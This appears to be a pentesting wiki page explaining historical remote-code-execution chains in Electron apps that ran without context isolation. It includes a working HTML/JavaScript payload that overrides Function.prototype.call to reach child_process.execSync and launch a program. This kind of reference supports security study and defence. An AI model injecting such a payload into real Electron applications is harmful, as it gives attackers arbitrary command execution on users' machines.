electron-contextisolation-rce-via-electron-internal-code.md (4604B)
1 --- 2 title: "Electron context-isolation RCE via internal code" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Electron context-isolation RCE via internal code 14 15 These are **historical exploitation patterns** for Electron applications that ran untrusted renderer content without context isolation. Context isolation has been enabled by default since Electron 12 and remains a recommended security setting.<sup>[[1]](#references)</sup> Exact internals differ by Electron and Node.js version, so reproduce a chain against the target application's bundled versions. 16 17 ## Example 1: overriding `Function.prototype.call` 18 19 This example comes from Masato Kinugawa's CureCon presentation.<sup>[[2]](#references)</sup> 20 21 In the affected historical Electron build, internal ASAR code registered a process `exit` listener. Because page code and Electron's internal code shared JavaScript prototypes when context isolation was disabled, renderer code could replace `Function.prototype.call` before the internal listener ran.<sup>[[2]](#references)</sup><sup>[[3]](#references)</sup> 22 23 ```javascript 24 process.on("exit", function () { 25 for (let p in cachedArchives) { 26 if (!hasProp.call(cachedArchives, p)) continue 27 cachedArchives[p].destroy() 28 } 29 }) 30 ``` 31 32  33 34 The listener was dispatched through Node.js's event machinery. The original page linked a stale `bin/events.js` path; the same historical commit's live source is under `lib/events.js`.<sup>[[5]](#references)</sup> 35 36  37 38 In this path, `self` is Node.js's process object: 39 40  41 42 The historical process object exposed a path to `require`: 43 44 ```text 45 process.mainModule.require 46 ``` 47 48 Because the listener dispatcher invoked the handler with the process object, overriding `call` could recover that object and execute a native command: 49 50 ```html 51 <script> 52 Function.prototype.call = function (process) { 53 process.mainModule.require("child_process").execSync("calc") 54 } 55 location.reload() // Trigger the listener during navigation 56 </script> 57 ``` 58 59 ## Example 2: prototype pollution 60 61 The ElectroVolt presentation demonstrates another historical chain that obtains a `require` object through prototype pollution.<sup>[[4]](#references)</sup> 62 63 Leak: 64 65 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28279%29.png" alt=""><figcaption></figcaption></figure> 66 67 Exploit: 68 69 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%2889%29.png" alt=""><figcaption></figcaption></figure> 70 71 ## References 72 73 - [1] [Electron documentation - Context isolation](https://www.electronjs.org/docs/latest/tutorial/context-isolation) 74 - [2] [Electron: Abusing the lack of context isolation - CureCon](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41) 75 - [3] [Electron historical source - lib/common/asar.js](https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36) 76 - [4] [ElectroVolt: Pwning Popular Desktop Apps While Uncovering New Attack Surface on Electron](https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81) 77 - [5] [Node.js historical source - `lib/events.js` listener dispatch](https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/lib/events.js#L156-L231)